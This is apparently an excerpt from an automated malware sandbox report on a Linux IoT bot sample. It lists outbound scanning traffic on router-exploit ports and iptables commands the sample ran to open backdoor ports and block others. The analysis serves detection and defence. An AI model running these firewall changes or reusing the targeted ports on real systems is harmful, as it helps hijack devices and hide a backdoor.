                            Source: global trafficTCP traffic: 158.70.45.62 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 171.23.177.240 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 35.184.146.118 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 170.254.161.26 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 220.235.116.138 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 203.108.157.203 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 128.118.97.120 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 157.237.189.119 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 195.214.23.156 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 220.234.56.30 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 60.61.74.47 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 142.172.142.87 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 197.48.190.105 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 66.197.17.76 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 3.111.24.133 ports 2,5,6,8,9,52869
                            Source: global trafficTCP traffic: 99.219.59.203 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 75.202.127.58 ports 1,2,4,5,9,49152
                            Source: global trafficTCP traffic: 144.141.113.17 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 167.242.62.228 ports 1,2,3,5,7,37215
                            Source: global trafficTCP traffic: 70.172.81.219 ports 1,2,3,5,7,37215
                            Source: /bin/sh (PID: 6275)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6282)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6285)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6290)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6296)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6299)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6302)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6328)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6331)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6334)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6337)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6344)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6347)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6350)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6353)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6356)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6359)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6369)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6377)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6380)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6387)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6393)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6401)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6404)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6407)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6414)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6420)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6426)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6432)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6438)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPTJump to behavior
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55170 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33862 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57246 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50476 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34956 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42656 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53386 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37290 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53460 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53152 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46644 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56416 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32770 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56786 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49462 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42460 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34158 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55426 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34592 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48832 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41512 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48810 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60062 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54916 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52194 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40736 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54474 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39080 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56834 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49334 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51128 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47196 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51090 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60498 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50342 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47266 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34698 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50164 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54360 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60268 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40872 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44094 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58788 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37558 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50614 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50966 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34526 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44616 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36296 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56402 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49388 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46276 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38626 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34686 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43986 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35766 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59794 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38618 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54792 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55294 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60714 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36632 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52560 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44238 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53554 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40020 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39706 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44322 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56664 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37722 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52506 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35628 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48112 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60778 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42750 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36116 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48768 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53434 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36702 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42466 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48570 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40158 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43418 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34658 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48726 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39538 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55572 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33374 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55508 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59782 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50698 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34298 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36608 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47068 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44886 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39688 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40018 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51364 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35312 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52432 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43402 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34066 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56088 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59688 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37608 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50660 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48846 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60010 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55030 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49060 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59674 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44448 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52900 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43532 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60140 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45422 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48626 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45656 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45596 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43880 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43958 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39428 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48312 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41518 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40154 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40196 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45114 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59424 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41272 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42548 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60776 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37724 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34628 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39656 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38284 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54284 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44394 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44166 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50630 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42854 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53612 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57450 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44056 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60002 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53354 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48974 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41324 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52684 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35616 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45496 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53778 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51038 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54604 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60844 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42354 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40806 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35144 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40192 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54634 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35108 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46152 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52986 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52390 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60010 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48438 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41060 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50664 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56158 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34918 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32944 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55158 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58314 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60376 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45890 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39998 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34878 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42772 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35580 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51652 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60476 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39566 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46480 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52416 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39552 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51036 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47010 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38028 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51176 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35580 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45924 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36814 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43140 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41862 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51534 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59094 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32962 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57848 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48938 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41766 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35750 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38332 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55162 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44994 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41838 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41154 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41548 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49106 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33322 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54972 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46566 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51756 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53140 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44560 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54308 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35620 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40358 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37510 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43296 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33188 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49390 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39368 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45414 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34304 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60006 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49412 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36202 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53644 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39746 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60674 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43582 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55736 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45748 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58586 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43462 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33110 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47508 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50770 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36988 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50712 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54156 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53132 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49046 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56752 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44882 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38508 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45316 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55040 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46662 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43836 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47488 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55338 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57684 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47342 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60802 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59396 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49346 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48352 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42380 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54502 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42546 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36150 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42708 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60934 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44144 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59526 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33998 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58790 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49396 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37714 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60546 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41122 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38514 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34022 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56744 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59388 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50578 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59942 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55994 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33796 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44686 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60346 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40850 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46068 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58286 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35292 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39496 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45210 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52046 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37048 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33060 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45990 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39538 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55058 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43144 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57418 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36874 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38780 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39452 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51612 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42400 -> 37215
